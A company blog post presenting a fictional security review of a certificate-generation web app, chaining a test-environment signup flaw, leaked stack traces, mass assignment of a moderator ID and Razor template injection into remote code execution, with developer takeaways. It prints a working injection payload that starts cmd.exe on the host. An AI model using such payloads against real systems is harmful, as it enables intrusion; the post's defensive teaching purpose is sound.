Blog

How I gained remote code execution and what can we learn as software developers

Stiig Gade Advisory Software Developer, Solita

Published 07 Jun 2023

Reading time 5 min

The following post is a fictional security review based on an aggregate of experiences regarding cyber security in software development and from conducting security reviews.

What is remote code execution (RCE)?

According to OWASP, RCE (or in their terms, code injection) is the process of injecting code, which is then interpreted or executed by an application or system. Personally, I consider this the holy grail of vulnerabilities. If an attacker gains access to an RCE, they can quickly take over the system and gain a foothold/persistence, so they can easily access said system afterwards.

Why am I even hacking?

Even though we are a tech, data and design company, we also offer cyber security services. We truly believe that security is a fundamental cornerstone of software development, and not a feature which is implemented as an afterthought in the last sprint, “because we have to”. By doing security reviews, we raise awareness of this fact both internally and externally, which improves the quality of our products, and helps clients reduce their attack surface.

Gaining access

I have been tasked with finding vulnerabilities within a system which is used to generate certificates. I start by powering up Burp Suite, and browse around the test environment, to get a feeling of the website. New users need to be approved by a moderator, before gaining access to the system. Well, in production at least, as it turns out that users get auto-approved in the test.

This would be alright if the test environment was behind a VPN, but it’s open to the public. I have now gained access to the test environment, and everyone else can too. This in itself may not seem too worrying, but let’s see where we can go from here.

Information exposure

I am a normal user in this system, and the only thing I can do is print certificates from predefined templates. The endpoint is GET /certificate/render/1?name=Stiig which renders said certificate, with my name. Now for every endpoint I find, I poke at it with various variations of requests, such as POST/PUT and with all kinds of input. POST’ing to said endpoint returns unauthorised, but because this is a test, I also get a message and stack trace:

Stack trace

From this, it doesn’t take a long time to extrapolate that the user entity has a relationship to a moderator entity, but as I am not a moderator, it seems like I don’t have that entity.

Privilege escalation

The system has an endpoint PUT /users, which is used to update my own information. It takes a user entity, that consists of name, email and password. But what if I extend this information with ModeratorId? Often the first user created in a system is an admin user, thus id 1 seems like a valid option:

Valid option

Looks like it was a success. Now I have escalated my privileges so that I can modify templates. One step at a time, we breach further and further.

This could have been avoided by specifying an input model which only had the desired properties, like this:

Public class

Now deserialised input will not include ModeratorId, thus it isn’t possible to change.

Server-side template injection exploit

As mentioned, the system allows for the creation of templates, if you have the proper privileges – which I do now. Let’s attempt to do this, but with special characters to see if the website is vulnerable. The process of testing for which payload should be used can easily be automated with various tools, but as I know this system runs .net, I might start with manually testing this with @-sign, which denotes expressions in Razor

Razor

Now when rendering this template, we can see that the code is executed:

Executed code

The payload sent was @(2+2) which is interpreted by the Razor engine.

Accessing the host

Time to verify if we can access the host system, which can easily be done with a simple payload:

@System.Diagnostics.Process.Start(\”cmd.exe\”,\”/c echo i_was_here > C:/temp/test.txt\”)”}’

Host

If this payload gets interpreted, we will create a file on the host system. Let’s attempt to GET this template:

And the final check, to see if the file was created:

As we have proof that we can start processes on the remote system, we have gained remote code execution and thus can infiltrate the host machine. And we did it in three small steps, each may have seemed innocuous, but together enabled the holy grail of vulnerabilities.

Escaping the containment

When conducting security reviews, we must oblige to certain rules. These rules are both for the customers’ protection, but also for our own protection, so that we don’t break something by mistake. In this case, I don’t want to access other systems, but I want to verify if a potential attacker might be able to do this. For this purpose, I could list other IIS-websites hosted by the machine. This gives the following output, which just confirms that test and production are hosted on the same machine:

Always separate different environments, so that if an attacker should gain access, (s)he can’t access other systems.

What is the takeaway?

The point of this post isn’t how to mitigate the individual vulnerabilities, but that systems are often compromised because of multiple vulnerabilities which are used in conjunction with one another. Reports of vulnerabilities are often brushed aside with the argument that exploitation requires other dependencies (like elevated rights). But as we have seen here, many small vulnerabilities can be stitched together to a large breach.

I want developers to change their fundamental chain of thoughts during development. When you implement functionality which handles user interaction, like an API, think evil. Think about how this could be exploited, and then think how this can be mitigated. Every single mitigated vulnerability reduces the attack surface of the system itself, but also other internal and external systems.

  1. DefSec
  2. Tech